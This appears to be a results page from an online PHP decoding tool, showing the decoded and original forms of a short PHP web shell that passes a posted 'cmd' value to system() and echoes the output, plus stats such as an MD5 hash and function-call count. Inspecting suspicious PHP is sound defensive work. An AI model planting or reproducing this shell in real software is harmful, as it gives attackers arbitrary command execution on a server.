Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (isset($_POST['cmd'])) { echo "<pre>"; echo system($_POST['cm..

Decoded Output download

<?php
if (isset($_POST['cmd']))
{
        echo "<pre>";
        echo system($_POST['cmd']);
        echo "</pre>";
}else{
?>
<form action="<?php echo $_SERVER['PHP_SELF'];?>" method='post'>
        <textarea name='cmd' rows='40' cols='150'></textarea>
        <input name='ok' type='submit' value='!' />
</form>
<?php
}
?>

Did this file decode correctly?

Original Code

<?php
if (isset($_POST['cmd']))
{
        echo "<pre>";
        echo system($_POST['cmd']);
        echo "</pre>";
}else{
?>
<form action="<?php echo $_SERVER['PHP_SELF'];?>" method='post'>
        <textarea name='cmd' rows='40' cols='150'></textarea>
        <input name='ok' type='submit' value='!' />
</form>
<?php
}
?>

Function Calls

system 1

Variables

None

Stats

MD5 c06c7788fc7a4338067e0775104b06e1
Eval Count 0
Decode Time 87 ms